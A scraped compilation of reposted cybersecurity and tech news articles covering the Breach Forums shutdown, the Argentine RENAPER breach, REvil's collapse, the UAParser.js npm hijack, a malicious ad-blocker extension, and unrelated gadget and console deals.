Breach Forums to Remain Offline Permanently

0
[ad_1]

The decision to shut down the Breach Forums came after the admin noticed someone had logged into an old forum CDN server on March 19th, 1:34 EST, 2023, indicating that federal authorities had access to Fitzpatrick’s devices.

Hackread.com has learned that the infamous hacker and cybercrime forum Breach Forums has been permanently shut down. On March 18th, 2023, it was reported that Conor Brian Fitzpatrick (aka Pompompurin, aka Pom), the owner, founder, and administrator of Breach Forums, was arrested in New York.

The question regarding the forum’s future after Fitzpatrick’s arrest was echoed across different forums, with speculations about whether the forum would be seized by authorities, like its predecessor forum Raid Forums.

The day the news of Fitzpatrick’s arrest surfaced, one of its administrators, who goes by the alias Baphomet, claimed responsibility for taking over the forum to keep it running and protect it from being seized. They also claimed to have cut all of Fitzpatrick’s access to the forum.

However, in a statement made on the official Telegram channel of Breach Forums earlier today, Baphomet has announced the permanent shutdown of the forum. In a statement, Baphomet apologized to forum users for any inconvenience and emphasized that their decision was made for the betterment and safety of everyone.

It is worth noting that Baphomet plans to start a new Breach Forums-like community in the near future. However, for now, all forum domains will be redirected to a website owned by Baphomet.

Reason for Sudden Shutdown

The initial plan of administrator Baphomet was to keep Breach Forums online, but what changed their mind? In a statement, the administrator explained that the decision to shut down the forum came after they noticed someone had logged into an old forum CDN server on March 19th at 1:34 EST, 2023, which indicated that federal authorities had access to Fitzpatrick’s devices.

Baphomet stated that running a forum with the fear of law enforcement access would be risky, and the best solution for everyone’s safety was to permanently shut it down. Here’s what Baphomet had to say:

This will be my final update on Breached, as I've decided to shut it down. I'm aware this news will not please anyone, but it's the only safe decision now that I've confirmed that the glowies likely have access to Pom's machine.

As I said early on in all of this, anything related to production Breached infrastructure was locked down immediately - however I was kind enough to leave a few old, non-essential servers completely unchanged. One of those servers I left unchanged is an old CDN from months ago that no longer hosts any CDN files or configs but rather was used to just download large files from time to time.

Throughout the migration I checked to see if anything was going on that would cause concern during the migration. One of the servers checked was the old CDN server described above. It seems someone logged in on Mar 19, 1:34 EST prior to me logging into the server. 

Unfortunately this likely leads to the conclusion that someone has access to Poms machine. Any servers we use are never shared with anyone else, so someone would have to know the credentials to that server to be able to login. I now feel like I'm put into a position where nothing can be assumed safe, whether it is our configs, source code, or information about our users - the list is endless. This means that I can't confirm the forum is safe, which has been a major goal from the start of this shitshow.

As for what this means now, It's complicated. Unlike when other communities go down and everyone scatters, stupidly I will still be around. I will redirect all the Breached domains to my baph.is domain. The Telegram group and channel will remain up for now, but I will make a new Telegram group for those interested in seeing what I have planned next. I will always be willing to sign a message to prove my identity to the community.

While the community of Breached will die, I'm going to continue conversations with some of the competitor forum admins and various service operators who reached out to me over the past few days. I'm hoping to work with some of those people to build a new community, that will have the best features of Breached while reducing the attack surfaces we never properly addressed. As with things like this, I have no doubt our userbase may be absorbed by another community but if there is patience then I hope to bring something back that will rival any other community that can take our place.

I'll be taking 24 hours from the sharing of this message to just rest and think. I'll be back online to talk with everyone, and we'll go from there. The domains for the time being shouldn't be seized, but I'll let the community know if any of that happens.

For now - see you, space cowboy.

Baphomet

What’s Next?

Although the shutdown of Breach Forums is seen as a positive initiative, for investigators, cybersecurity journalists, and researchers, it may become a rabbit hole. With no reliable community to turn to, cybercriminals could move to Russian-language forums to dump stolen databases, which is a bigger and larger-scale threat to unsuspecting users and organizations.

It is worth noting that Russian hacker forums are already forming alliances with Chinese-speaking hacker groups, which could eventually become a perfect recipe for disaster for adversaries on the opposite side.


[ad_2]
Source link

Hacker steals govt database with info of entire Argentine population

0
[ad_1]

After the infamous La Gorra Leaks in 2017 and the exposure of Argentinian politicians and law enforcement officials in 2019, Argentine is back in the news for all the wrong reasons. This time, hackers have reportedly stolen a government database containing the entire Argentine populace’s information, which means around 46 million people are currently at risk of exploitation.

About the Hack

According to The Record, an Argentine government database known as RENAPER (Registro Nacional de las Personas/Argentina’s National Registry of Persons) was targeted. RENAPER hosts the country’s national registry, official ID card details, and photos of all 45.3 million citizens.

SEE: Google Argentina domain bought by a random citizen for $5

Reportedly, hackers have managed to steal the ID card data of the entire population and are now trying to sell it in private circles. Given the trove of information this database might contain, it could be a goldmine for threat actors as they can use it for scams, attacks, and exploits.

Hacker steals govt database with info of entire Argentine population
Screenshot shows the data being sold on a prominent hacker forum (Image: Hackread.com)

How did the Breach happen?

According to Argentinian media, the hacker breached the government’s IT network and stole ID card details. The breach took place in September, indicating that the government failed to protect its citizens’ identities.

The targeted department was responsible for issuing ID cards to all citizens, and the data was stored in digital format, and it was only accessible by government agencies. Hence, it seems probable that a security loophole would have allowed the hackers to infiltrate the network.

Entire Population’s ID Card Details Stolen

The Record reported that the first evidence that RENAPER was breached emerged earlier in October when a newly registered Twitter handle @AnibalLeaks published ID card photos of 44 well-known Argentinian celebrities, including president Alberto Fernández, football superstars Sergio Aguero and Lionel Messi, journalists, and political figures.

One day later, the personal details and images were also published on Twitter, and the hacker posted an ad on a popular hacking forum.

Government’s Response

The Argentinian government confirmed the breach three days later in a press release in which the Ministry of Interior explained that its security team learned that a VPN account assigned to the Ministry of Health was used to examine RENAPER for 19 photos. That very moment the photos were published on Twitter.

SEE: Argentina’s largest telecom hacked with hackers demanding $7.5 million

“The [RENAPER] database did not suffer any data breach or leak,” the ministry confirmed, adding that authorities are currently investigating 8 government employees for their possible involvement in the leak.

The hacker contradicted the government’s official statement when The Record contacted them and said they had a copy of the RENAPER database. Hackers proved their claim by sending personal details, including the Trámite number, of an Argentinian national chosen by The Record.

“Maybe in a few days I’m going to publish [the data of] 1 million or 2 million people,” the hacker told The Record.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link

Minecraft declared the most malware-infected game

0
[ad_1]

Malware strains have gradually become the leading cause of infection targeting millions of devices worldwide annually. A new report from Atlas VPN revealed that the PC and mobile gaming industry is the current big target of malware authors and Minecraft is their favorite game to bait gamers.

New Survey Reveals Startling Details

Atlas VPN researchers created a list of the most-targeted games both for mobile and PC. Minecraft topped the chart on both platforms. According to the researcher, nearly 184,887 players were impacted on PC as they downloaded malware hidden inside a Minecraft file.

SEE: 50,000 Minecraft users infected with hard drive wiping malware

Moreover, there were more than three million total detections of infected Minecraft files. Conversely, on mobile devices, Minecraft-related malware infected 44,335 devices while antivirus software detected 300,000 malware cases, reported Kaspersky Security Network.

It is understandable why malware developers are so keen on targeting Minecraft fans. The game is massively popular on both mobile and PC, for instance, as of 2021, Minecraft was home to over 131 million players.

Almost 303,827 Devices Affected Within a Year

In its survey, Atlas VPN concluded that between July 2020 and July 2021, around 303,827 devices got infected with malware spread via different malicious gaming software. Being the leading and most played game in the market, Minecraft attracted the highest number of malware since more than half of these 303,827 devices were affected by Minecraft-related malware.

Most Infected Games

Apart from Minecraft, many other games are on the radar of malware developers. These include:

  • Sims 4
  • PUBG
  • Free Fire
  • Among US.

Among US reported 9616 malware detections, whereas PUBG showed 9084, and Free Fire showed 6065 malware detections. On PC, Sims 4 and Minecraft attracted the most malware, followed by:

  • PUBG
  • Fortnite
  • Grand Theft Auto 5
  • Counter-Strike GO
  • League of Legends
  • Rocket Leagues
  • FIFA 21
  • Need for Speed Heat.

How are Gamers Targeted?

Minecraft, Sims 4, and other games that require users to download modpacks or mods are the prime targets of malware developers and scammers. A major chunk of such games is accessed by downloading additional files. Downloading mods bring the game to a whole new level and enhances players’ competitiveness.

When content creators combine several mods, it is called the modpack, which drastically improves the game. But the problem is that for downloading modes, you have to access third-party services and websites, which is where cyber criminals hide the malware.

How To Stay Safe?

Since mods are a hotspot for malware you have to be careful while downloading them. There is no need to avoid downloading mods but ensure you download them from official and trusted sites only. Every game with modding features has a hub where you can search and download your desired mods, such as Minecraft has CurseForge boasting a vast catalog of modpacks and mods.

SEE: Malware infected Minecraft modpacks hit Google Play Store

Moreover, never click on links or download files that promise cheating programs or hacks to help you gain an unfair edge over your competitors because it might be a malware payload. And whenever you feel like trying out a new game download it from the official website or store.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link

Motorola Moto G54 appears in all color options

0
[ad_1]

The Motorola Moto G54 has just surfaced in all color options, following a leak from earlier this month. This is the best view of the Moto G54 we have thus far, thanks to Evan Blass aka @evleaks.

The Motorola Moto G54 will launch in three color options, and all of them are shown here

As you’ll see in the gallery below the article, there are three color variants of the phone shown here. Those are seemingly all the colors that Motorola will offer. We have black, blue, and green versions shown here

The device will feature a flat display, with a centered display camera hole. All of that is clearly visible in the provided images. The bottom bezel will be thicker than the rest, which is not surprising.

On the back, the company will include two cameras inside the same camera island. Those cameras will sit in the top-left corner of the phone’s backplate. Motorola’s logo is also visible on the back, and the backplate is slightly curved towards the sides.

It will also include a 120Hz display, a 5,000mAh battery, and a 50MP main camera

This will be a mid-range phone, but it will still have rather interesting specs. We know that because some of them leaked before. The Moto G54 is tipped to feature a 6.5-inch fullHD+ display. That panel will offer a 120Hz refresh rate.

A 5,000mAh battery was also mentioned, as was a side-facing fingerprint scanner. Android 13 will come pre-installed on this smartphone, that’s for sure.

A 50-megapixel main camera was also mentioned in rumors, and it will offer OIS support. The last piece of information we have is that the device will include stereo speakers.

Its price tag is still a mystery, but it is expected to arrive in the near future. The Motorola Moto G53 arrived in December, but considering the timing of these rumors, the Moto G54 may launch sooner than that. We’ll have to wait and see.


[ad_2]
Source link

How using the purple team approach helps in addressing cybercrime

0
[ad_1]

Automated purple teaming is one of the best ways to address cybercrime as it does not only test for the deficiencies in existing security controls – Let’s dig deeper into this approach.

An IBM report reveals that the cost of data breaches has reached record highs over the past year. The banking industry has also seen an exponential rise in ransomware attacks, with one study indicating that banks have seen a 1,318 percent increase in ransomware attacks in 2021. Cyber attacks are on the rise, and it is only logical to respond to them by fortifying defenses.

Cyber defense fortification is not just about having the best security controls, though. Even with the most advanced security tech, bad actors can still find their way into networks or IT assets if they manage to find vulnerabilities they can exploit. Hence, organizations should consider security validation as a critical part of their security posture.

SEE: Google, Microsoft, and Oracle generated most vulnerabilities in 2021

One of the best ways to undertake security validation at present is purple teaming, an approach that entails the collaboration between the red (attack) and blue (defense) teams while still keeping them independent from each other. It significantly strengthens cyber defenses by taking advantage of the adversarial perspective in examining vulnerabilities and anticipating potential attacks.

In turn, purple teaming can serve an important role in addressing cybercrime. If this does not sound convincing enough, consider the following points.

Threshing out security weaknesses

Security validation is not just some supplementary security process implemented by organizations. It is crucial because it ascertains that the security controls put in place are functionally sound and capable of delivering the kind of protection expected from them. Testing security controls optimize an organization’s security posture by spotting defects or weaknesses promptly and addressing them accordingly.

Given the massive volumes of attacks, though, it is impossible to keep up with the attempts to penetrate cyber defenses using manual security testing. Also, with the increasing sophistication of attacks, it is usually not enough for organizations to rely on their in-house cybersecurity teams. They need an adversarial perspective as well as a more efficient way to detect and deal with the attacks. This is where advanced automated purple team simulation comes in. 

Automated purple teaming is one of the best ways to address cybercrime as it does not only test for the deficiencies in existing security controls. It also helps in the evaluation of variations of threats and lateral attacks that may defeat defenses unexpectedly. With the help of up-to-date threat intelligence and a standardized collaborative threat handling framework like MITRE ATTACK, organizations can achieve enhanced security strategies capable of addressing even zero-day attacks and the complex schemes of bad actors.

Purple teaming, by the way, does not mean the creation of a new team with members coming from the red and blue teams. It is mainly about sharing insights on how to improve attack and defense simulations without necessarily letting each other know what the red and blue teams are doing. Purple teaming enables collaboration to help explore scenarios that would otherwise be left unexplored when the red and blue teams are virtually working in silos.

Countering the commonplaceness of vulnerable software

A survey report entitled Modern Application Development Security reveals that nearly five in every ten organizations wittingly release vulnerable codes. They make available to the public software or applications that have not gone through rigorous security testing. This affects not only the software or app providers but more importantly the end-users. It means vulnerabilities that can be exploited by cybercriminals to steal data, interrupt operations, or spread malicious software.

This tendency to push vulnerable software happens mainly because of very strict deadlines imposed on app developers. There are also instances when developers just do not have enough time to address security problems because the vulnerabilities have been discovered too late.

Purple teaming provides a good solution for this common problem by helping organizations undertake thorough evaluations of the security of the applications they are using. Companies can employ purple teaming to scrutinize their systems and discover various weaknesses in their software, including web applications, that have the potential to become serious cybersecurity incidents.

Purple teaming on web app use is a boon to many businesses that are now relying on online services or web-based platforms instead of using conventional client-based apps. Web apps are favorite targets for many cybercriminals because they can find various useful data that are often kept online for convenient access. Also, cyber attackers understand that they can “achieve better outcomes” if they manage to paralyze business operations after disrupting an organization’s core web apps.

Also worth noting, the OWASP Top 10 has been updated to reflect the growing seriousness of software security issues. Broken Access Control now tops the list in view of the increasing instances of Common Weakness Enumerations (CWEs) observed among web apps. This entails that organizations need to pay more attention to the security of the web applications they are using.

In a way, purple teaming can plug security issues that have been left unaddressed by the software developers. Organizations may not be able to plug these security gaps by modifying the app codes, but they can institute changes or new measures to prevent software vulnerabilities from contaminating the rest of their system and IT assets.

Addressing the human error factor

One IBM study says that human error is the leading cyber threat to businesses in 2021. These errors can be attributed to carelessness, switching to new arrangements that affect the cybersecurity posture, configuration errors, and the failure or refusal to update among others. 

As fraud prevention tech expert Mus Huseyin declares, “Corporates seeking to protect digital assets must face an uncomfortable truth: the biggest threat to cybersecurity lies within the company.” Security technologies have continued improving significantly, but it appears the human problem in cybersecurity has remained largely the same over the years.

This is why there are still many cases of successful attacks that take advantage of human error.  A VentureBeat report says phishing attacks on banking customers have risen by 30 percent in 2020. There are also reports that show dramatic increases in human hacking attacks across different digital channels. Social engineering attacks continue to be a critical threat to all kinds of organizations because of the human error factor.

SEE: OpenSea vulnerability allowed crypto stealing with malicious NFTs

Purple teaming is an effective way to address human errors in cybersecurity. By bringing together the adversarial perspective and expertise of cyber defense professionals, it becomes easier to detect and eliminate potential vulnerabilities in systems that are linked to human errors. Mistakes in configurations, problematic threat handling protocols, protocols that allow employees to ignore security procedures, and other similar weaknesses can be detected and addressed through purple teaming.

Cybercrime prevention and impact mitigation

Prevention is always better than cure, and this is what purple teaming does as it examines the effectiveness of security controls in catching and stopping cyber attacks. What makes purple teaming even better is that it can also help with mitigation. The purple team modules in automated cybersecurity platforms, for example, are designed to provide quick options on how to deal with detected threats or attacks.

Cybercrimes succeed because of poor cyber defenses. To strengthen these defenses, organizations should deem security validation particularly through purple teaming as something essential for their security posture.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link

Data analytics firm exposed 2m Instagram and TikTok users’ data

0
[ad_1]

The victims of this “data leak” also include celebrities like Alicia Keys, Loren Gray, Kylie Jenner, Ariana Grande, and Kim Kardashian.

The cybersecurity team at Safety Detectives, led by Anurag Sen, discovered an unsecured ElasticSearch server belonging to IGBlade.com, a social media analytics site. The server stored scraped data of millions of social media users. The data was taken from TikTok and Instagram.

Reportedly, at least 2.6 million user profiles have been exposed, equivalent to over 3.6 GB of data. The researchers dubbed it a shocking discovery since data scraping is banned on most social media websites, although it isn’t illegal.

About IGBlade.com

It is a Romanian website that collects social media users’ data to offer its clients an in-depth understanding of an Instagram or TikTok account. The platform has gathered data from millions of social media accounts of more than 30 different data metrics.

SEE: Data scraping firm leaks 235m Instagram, TikTok, YouTube user records

It then consolidates this information into a “navigable social account search engine” that displays critical data such as followers rate, demographics stats, engagement rate, data visualizations, account history, etc. To obtain these social media insights, users are required to create an account on IGBlade.

What was Exposed?

Part of the exposed data were screenshots and links to profile pictures and other types of scraped personal data of social media users. It is worth noting that all data on the exposed database was publicly available.

However, the incident has yet again ignited the debate on the controversial use of data scraping. Researchers claim that the data was left exposed without any encryption or password protection in place. The exposed data included:

  • Full names
  • Usernames
  • location data
  • About details
  • Profile pictures
  • Phone numbers
  • Email addresses
  • Engagement rate metrics
  • Follower counts & following counts.

Some celebrities were also affected, including:

  • Alicia Keys
  • Loren Gray
  • Kylie Jenner
  • Ariana Grande
  • Kim Kardashian
Data analytics firm exposed 2m Instagram and TikTok users' data
Kim Kardashian’s data (Left) – Loren Gray’s data including her business phone number (Right)

According to Safety Detectives’ blog post,

“The scraped data of users on the server is the same data that features each user’s corresponding IGBlade.com page, and the database often provides links back to IGBlade. This is how we know the database belongs to IGBlade.com,” researchers noted.

The exposed data was available online for more than a month until Safety Detectives’ researchers discovered it on July 5 and notified IGBlade. The company secured it on the same day.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link

Ad-blocker Chrome extension AllBlock injected ads in Google searches

0
[ad_1]

AllBlock was available on Google Chrome’s Web Store where it is marketed as a potent Ad Blocker focusing on Facebook and YouTube to prevent pop-ups.

Google has maintained that it takes the security of Chrome extensions very seriously and regularly vets them to prevent exploitation. However, the new report from Imperva reveals that maybe Google isn’t performing its job as sincerely as it claims to be.

Chrome’s Ad-Blocker Extension Displaying Ads on Google

Security vendor Imperva’s Sillam and Ron Masas reported that a Google Chrome extension called AllBlock designed to block ads is injecting ads into Chrome and Opera.

Ad-Blocking Chrome extension caught injecting ads in Google searches

Although the extension blocks ads, it runs a script in the background that injects a piece of JavaScript code into every tab that the user opens. This code communicates to remote servers and download/installs a payload connected to an ad-injection scam’s operators.

“When the user clicks on any modified links on the webpage, he will be redirected to an affiliate link. Via this affiliate fraud, the attacker earns money when specific actions like registration or sale of the product take place,” Imperva researchers observed.

The payload then retrieves a series of unwanted ads, most of which are not from legitimate sources, and includes affiliate links. AllBlock was available on Google Chrome’s Web Store where it is marketed as a potent Ad Blocker focusing on Facebook and YouTube to prevent pop-ups. It has now been removed from Opera add-ons and Chrome Web Store.

What is Ad Injection?

Ad injection is a method of inserting ads or links into a web page that isn’t supposed to host them. Scammers can earn money from advertisements by injecting unrelated ads or redirect unsuspecting users to affiliate links to earn a commission.

Ad-Blocking Chrome extension caught injecting ads in Google searches

Imperva researchers identified such a campaign in August 2021 where several previously unknown domains were found to be distributing an ad injection script that would send legit URLs to a remote server and, in response, obtained a list of redirection domains. Consequently, when a user clicked on an altered link, they were redirected to another page, usually an affiliate link.

Ad injection scripts may feature evasion techniques like excluding Russian search engines, active detection of Firebug variables, and clearing the debugging console after every 100ms. In AllBlock ad injection scam, Imperva researchers were able to find the script in bg.js that they had been looking for since August.

How is The Extension Marketed?

It is yet unclear how AllBlock is distributed or promoted. According to Imperva, scammers are probably using other extensions in this campaign. They couldn’t identify the origin of the attack because of the way the malicious script was injected.

“The script we first observed was injected via a script tag pointing to a remote server where the AllBlock extension injects the malicious code directly to the active tab,” Imperva’s report revealed.

This indicates a larger campaign at work using different delivery methods and extensions, which might be connected with the PBot campaign.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link

Best Buy’s latest flash sale includes a crazy good deal on the Xbox Series S

0
[ad_1]

Best Buy has a really incredible deal on the Xbox Series S right now. You can pick it up for $249.99, which is $50 off. But that’s not really the deal here though. This is the Gilded Hunter Bundle, which does have in-game consmetics and virtual currency for Fortnite, Rocket League and Fall Guys. All of which you can download onto the Xbox Series S with just the click of a button.

Xbox Series S Gilded Hunter Bundle – Best Buy

Why you should buy the Xbox Series S

The Series S is the cheaper Xbox on this console run, which isn’t a bad thing actually. It’s an all-digital model, which means that you will need to download all of your games onto this console. So the 512GB of storage may not go as far as you initially thought. But Xbox does make it pretty easy to add some more storage to your console.

What’s great about the Xbox Series S is, that you can use Game Pass on here. That’s going to give you instant access to hundreds if not thousands of games, for a low monthly subscription. Giving you a whole library of games, without spending hundreds of dollars all at once.

Small size and affordable price. The Xbox Series S is the smallest and most affordable Xbox console ever made. It measures just 6.5 x 15.1 x 27.5 cm and weighs only 1.93 kg, making it easy to fit into even a small space. It is also the most affordable next-generation console, starting at $299.

Fast loading times. The Xbox Series S has a custom NVMe SSD that provides significantly faster loading times than previous Xbox consoles. This means you can get into the action faster and spend less time waiting for games to load.

Support for 120fps gameplay. The Xbox Series S supports 120fps gameplay with games that support it. This means you can experience smoother and more responsive gameplay, especially in fast-paced games.

Upscaling to 4K resolution. The Xbox Series S can upscale games that are not natively 4K to 4K resolution. This means you can still enjoy games in a high-definition image, even if you don’t have a 4K TV.

Support for Dolby Atmos and Dolby Vision. The Xbox Series S supports Dolby Atmos and Dolby Vision HDR, which provide immersive audio and visual experiences.

Backward compatibility. The Xbox Series S is backward compatible with all Xbox One games, so you can play your old games on your new console.

You can buy the Xbox Series S Gilded Hunter Bundle from Best Buy today at the link below.

Xbox Series S Gilded Hunter Bundle – Best Buy


[ad_2]
Source link

REvil ransomware gang goes dark after its Tor sites are hacked

0
[ad_1]

In July 2021 the REvil ransomware group vanished due to mounting US pressure after the Kaseya attack. However, the group was back in September 2021 by carrying out extortion-based DDoS attacks on ITSPs in the UK and Canada/America.

The infamous REvil ransomware group has suddenly announced to end its activities. The group, which gained prominence over cyberspace with high-profile ransomware attacks against Kaseya, JBS, and Travelex this year, has reportedly decided to go underground after its Tor payment portal and data leak blog were hijacked.

The news of REvil’s shutdown was posted on a well-known criminal forum run by a threat actor “0_neday” suspected to be associated with the gang and was first reported by Dmitry Smilyanets from Recorded Future.

It is worth noting that in July 2021, the REvil ransomware group vanished due to mounting US pressure after the Kaseya attack. However, the group was back in September 2021 by carrying out extortion-based DDoS attacks on ITSPs in the UK and Canada/America.

REvil Announces Shutdown

The post where the group announced the closure of its activities revealed that the REvil gang’s Tor services were allegedly hijacked and whoever hacked it replaced the services with a copy of the gang’s private keys, which they must have obtained from a previous backup. The server was claimed to be “compromised,” and the group stated in the post that “they were looking for me.”

“To be precise, they deleted the path to my hidden service in the torrc file [used for configuring the Tor service] and raised their own so that I would go there. I checked on others — this was not. Good luck everyone, I’m off,” REvil operator(s) noted in the post.

As shown in the screenshot below, the operator used the infamous Russian language hacker forum XSS.IS to publish their post:

REvil ransomware gang goes dark after its Tor sites are hacked

Who Hijacked REvil’s Tor Sites?

At the moment, there’s no clarity regarding who could have hijacked REVil’s Tor sites. According to The Washington Post, the FBI had managed to access encryption keys used by the REvil gang for the Kaseya attack in July. But the agency couldn’t take down the gang.

There are rumors that the Tor sites have been taken over by a former member of the REvil group known as Unkn/Uknown, who has been a spokesperson for the gang but didn’t accompany them when the group resurfaced in September 2021.

A website called VX-Underground tweeted that just Uknown and the threat actor on whose forum REvil’s closure statement was posted had access to domain keys, and the ransomware gang’s domain was accessed recently with Unknown’s keys.

REvil ransomware gang goes dark after its Tor sites are hacked

“Since there was no confirmation of the reason for his loss, we resumed work, thinking that he was dead. But since we have today at 17.10 from 12:00 Moscow time, someone brought up the hidden-services of a landing and a bog with the same key as ours, my fears were concerned,” the threat actor explained.

However, in a conversation with Hackread.com, Steve Moore, chief security strategist, Exabeam said that, “This latest disruption seems to be caused by insider fighting or possible offensive takedown – it’s the final blow to REvil. The operator only mentions a “third party” – no attempt is made to identify their identity.

“Keep in mind these are organizations like any other, but with fewer rules. Based on information shared, they lost control of their backups which contained keys to overtake their network. In the exciting twist, the adversary was seemingly taken down due to weak technology hygiene, a flaw generally exploited by them to extort money from their victims, ” Moore added.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link

CISA warns of trojanized versions of JavaScript library’s NPM package

0
[ad_1]

The warning comes days after three rogue packages, okhsa, klow, and klown discovered by DevSecOps firm Sonatype, were removed from the NPM repository.

On Friday, the US Cybersecurity and Infrastructure Security Agency (CISA) released a warning to disclose an incident related to the GitHub Advisory Database. According to CISA, a crypto-mining malware was hidden in a popular JavaScript NPM library, UAParser.js.

The library rakes in more than six to eight million downloads per week and is used in websites and applications to identify browsers and systems used. The NPM platform became a part of Microsoft-owned GitHub in 2020.

Three Rogue NPM Packages Discovered

The warning comes days after three rogue packages, okhsa, klow, and klown discovered by DevSecOps firm Sonatype, were removed from the NPM repository.

Reportedly, three versions of UYAParser.js, 0.7.29, 0.8.0, 1.0.0, were embedded with malicious code after the attacker successfully hijacked the NPM account of the maintainer.

It was identified that a device running any of these versions could allow attacked access to sensitive and confidential information and even let them take control of the computer.

It is suspected that the malicious code was injected to install a crypto miner on the targeted system. The issue is now patched in versions 0.7.30, 0.8.1, and 1.0.1.

Developer’s Response

It was developed and maintained by an Indonesian programmer Faisal Salman (who uses the alias faisalman to publish his software). The programmer posted on his Gitmemory profile that his developed software has been modified and embedded with malicious code.

“I believe someone was hijacking my NPM account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware,” Salman said.

GitHub Alert

In an independent alert, GitHub notified users that any computer running this package should be considered compromised, and therefore, sensitive data and keys stored on the device should be transferred to another device.

“The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it,” the notice read.

Did you enjoy reading this article? Like our page on Facebook and follow us on Twitter.


[ad_2]
Source link